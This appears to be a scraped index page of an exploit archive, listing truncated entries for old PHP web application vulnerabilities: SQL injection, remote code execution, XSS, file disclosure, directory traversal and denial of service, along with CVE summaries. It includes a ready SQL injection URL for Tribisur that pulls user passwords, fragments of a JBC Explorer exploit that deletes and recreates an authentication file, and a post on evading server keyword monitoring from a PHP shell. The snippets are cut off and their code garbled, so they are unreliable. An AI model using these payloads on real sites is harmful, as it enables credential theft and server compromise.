Tribisur <= 2.0 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ============================================ Tribisur And now the bugged code :- : So we can exploit it with this simple PoC: forum.php?action=liste&cat=-1+union+select+0,concatpseudo,0x3a,passe,0,0,0,0,0,0,0,0+from+utiliz+where+id=1 Bug 2...

Bypass the web environment keyword monitoring attempt-vulnerability warning-the black bar safety net

by Don not Fox http://blog.wang1.cn Problem: win2003+php environment, server installation similar to the“best information monitoring system,”The thing is, for some set of keywords for blocking. So I'm in phpshell, Execute sql queries and system command, you be prompted file does not have permissi...

Unfixed XSS vulnerability at kkanari.org

Security researcher tweetycoaster, has submitted on 28/12/2007 a cross-site-scripting XSS vulnerability affecting kkanari.org, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 16/01/2008. It is currently...

mBlog 1.2 - &#039;page&#039; Remote File Disclosure

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: : : : vuln.: mBlog 1.2 Remote File Disclosure Vulnerability : : script info and download: http://www.c97.net/dl/index.php?act=view&id=8 : : no dork for s-kiddie ; : : : : author: irk4zatyahoo.pl : : greets to: str0ke,...

Design/Logic Flaw

classes/Url.php in Justin Hagstrom AutoIndex PHP Script before 2.2.4 allows remote attackers to cause a denial of service CPU and memory consumption via a %00 sequence in the dir parameter to index.php, which triggers an erroneous "recursive calculation."...

CVE-2007-5984

The CVE-2007-5984 issue affects Justin Hagstrom AutoIndex PHP Script prior to 2.2.4. A crafted %00 sequence in the dir parameter to index.php triggers an erroneous recursive calculation, leading to a denial of service (high CPU and memory consumption). The vulnerability is remote and does not spe...

CVE-2007-5983

The CVE affects the Justin Hagstrom AutoIndex PHP Script prior to 2.2.3, where the vulnerable component is index.php. The root cause is a Cross-site Scripting (XSS) vulnerability that allows remote attackers to inject arbitrary web script or HTML through the PATH_INFO (PHP_SELF). The exploitation...

AutoIndex PHP Script 2.2.22.2.3 - index.php Denial of Service

AutoIndex PHP Script 2.2.22.2.3 - index.php Denial of Service source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. Successfully exploiting this issue allows...

AutoIndex PHP Script 2.2.2/2.2.3 - &#039;index.php&#039; Denial of Service

source: https://www.securityfocus.com/bid/26410/info AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input. Successfully exploiting this issue allows remote attackers to consume excessive CPU resources,...

JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit

Exploit for unknown platform in category web applications ======================================================= JBC Explorer agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php";...

JBC Explorer 7.20 RC 1 - Remote Code Execution

!/usr/bin/php agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php"; $xpl-post$url.'dirsys/modules/auth.php', 'suppr=1'; print "\n0x02Creating the file auth.inc.php";...

Directory traversal

Directory traversal vulnerability in index.php in Firewolf Technologies Synergiser 1.2 RC1 and earlier allows remote attackers to include and execute arbitrary local files via a .. dot dot in the page parameter. NOTE: this can be leveraged to obtain the path by including a local PHP script with a...

TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution

The remote host is running TikiWiki, an open source wiki application written in PHP. The version of TikiWiki on the remote host fails to sanitize input to the 'f' parameter of the 'tiki-graphformula.php' script before using it as a function call. Regardless of PHP's 'registerglobals' setting, an...

lightblog-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n";...

Promise NAS NS4300N GUI bug

List, There is a bug in the Promise NAS NS4300N web GUI firmware version 1.1.0.5 which allows an authenticated admin user to change the password of the 'root' account. The user management portion of the web interface allows the admin user to change user's passwords. The PHP script that handles th...

promise-root.txt

List, There is a bug in the Promise NAS NS4300N web GUI firmware version 1.1.0.5 which allows an authenticated admin user to change the password of the 'root' account. The user management portion of the web interface allows the admin user to change user's passwords. The PHP script that handles th...

CVE-2007-5113

report.cgi in Google Urchin allows remote attackers to bypass authentication and obtain sensitive information web server logs via certain modified query parameters, as demonstrated using the profile, rid, prefs, n, vid, bd, ed, dt, and gtype parameters, a different vulnerability than CVE-2007-511...

Chupix CMS 0.2.3 - &#039;download.php&#039; Remote File Disclosure

Chupix CMS 0.2.3 download.php Remote File Download Vulnerability P.Script : http://sourceforge.net/project/showfiles.php?groupid=134930 download.php Lain:18-57 - ifisset$GET'fichier' ", "", $result;...

CVE-2007-4820

Absolute path traversal vulnerability in blanko.preview.php in Sisfo Kampus 2006 allows remote attackers to read arbitrary local files, and possibly execute local PHP scripts, via the nmf parameter...

xampp-local.txt

. //27.08.2007 16:36 .. //14.08.2007 14:21 108 .asadminpass //14.08.2007 14:21 772 .asadmintruststore //14.08.2007 18:31 .exe4j4 //26.08.2007 03:13 427 .glade2 //21.08.2007 16:35 .msf3 //10.08.2007 04:41 Contacts //27.08.2007 01:44 129 default.pls //27.08.2007 17:57 Desktop //23.08.2007 21:12 $qQ...